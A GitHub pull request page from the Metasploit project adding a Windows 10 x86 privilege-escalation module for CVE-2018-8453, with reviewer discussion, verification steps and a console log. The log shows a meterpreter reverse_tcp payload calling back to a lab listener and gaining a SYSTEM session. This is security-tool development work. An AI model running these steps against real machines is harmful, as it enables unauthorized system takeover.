Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Add module for cve-2018-8453 #12011

Merged
merged 1 commit into from
Jul 15, 2019
Merged

Add module for cve-2018-8453 #12011

merged 1 commit into from
Jul 15, 2019

Conversation

jrobles-r7
Copy link
Contributor

@jrobles-r7 jrobles-r7 commented Jun 25, 2019
edited by wchen-r7
Loading

Add local Windows Privilege escalation module for cve-2018-8453.
PoC code is from x86 version of https://github.com/ze0r/cve-2018-8453-exp
The author has given permission to use their code in msf as well.

Verification

List the steps needed to make sure this thing works

  • Get a non-SYSTEM meterpreter session on Win10 v1703 x86
  • use exploit/windows/local/cve_2018_8453_win32k_priv_esc
  • set session <session>
  • exploit
  • Get a SYSTEM session

@wchen-r7 wchen-r7 self-assigned this Jun 25, 2019
@wvu wvu removed the tests label Jun 26, 2019
@wvu
Copy link
Contributor

wvu commented Jun 26, 2019

Removed tests label. Reapply if I was wrong. Thanks.

@wvu wvu added the docs label Jun 26, 2019
wvu
wvu approved these changes Jun 26, 2019
View reviewed changes
Copy link
Contributor

@wvu wvu left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Another clean submission. Very nice. Only a couple questions but otherwise no changes required.

@wchen-r7
Copy link
Contributor

So Jacob and I had a little discussion about this pull request, and I requested at least these changes:

  • The exploit binary needs to be compiled with /MT for the runtime library setting.
  • The offsets are rather specific to build 15063 on Win 10. We want to allow that to be more configurable for the user, also ship with pre-configured ones to cover common builds (example: images downloadable from MSDN)

After that, as long as the exploit works, I can take over the rest and land this.

@wchen-r7
Copy link
Contributor

It works!

msf5 exploit(windows/local/cve_2018_8453_win32k_priv_esc) > show options

Module options (exploit/windows/local/cve_2018_8453_win32k_priv_esc):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  1                yes       The session to run this module on.


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     172.16.138.1     yes       The listen address (an interface may be specified)
   LPORT     5555             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows 10 v1703 (Build 15063) x86


msf5 exploit(windows/local/cve_2018_8453_win32k_priv_esc) > run

[*] Started reverse TCP handler on 172.16.138.1:5555 
[+] Exploit finished, wait for privileged payload execution to complete.
[*] Sending stage (179779 bytes) to 172.16.138.129
[*] Meterpreter session 2 opened (172.16.138.1:5555 -> 172.16.138.129:49674) at 2019-07-15 02:35:24 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

@wchen-r7
Copy link
Contributor

A little minor changes here and there and then I should be able to land it. Thanks for waiting!

@wchen-r7 wchen-r7 merged commit a55aea3 into rapid7:master Jul 15, 2019
wchen-r7 added a commit that referenced this pull request Jul 15, 2019
@wchen-r7
Land #12011, Add module for cve-2018-8453
27bb166
@wchen-r7
Copy link
Contributor

wchen-r7 commented Jul 15, 2019
edited by tdoan-r7
Loading

Release Notes

A module for cve-2018-8453 has been added to the framework. It is a local Windows Privilege escalation module that works for x86 Windows 10 build 15063.

msjenkins-r7 pushed a commit that referenced this pull request Jul 15, 2019
@wchen-r7 @msjenkins-r7
Land #12011, Add module for cve-2018-8453
5786ad9
@jrobles-r7 jrobles-r7 deleted the feature/cve-2018-8453 branch July 22, 2019 14:44
@tdoan-r7 tdoan-r7 added the rn-modules release notes for new or majorly enhanced modules label Jul 23, 2019
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@wvu wvu wvu approved these changes

Assignees

@wchen-r7 wchen-r7

Labels
docs module rn-modules release notes for new or majorly enhanced modules
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
4 participants
@jrobles-r7 @wvu @wchen-r7 @tdoan-r7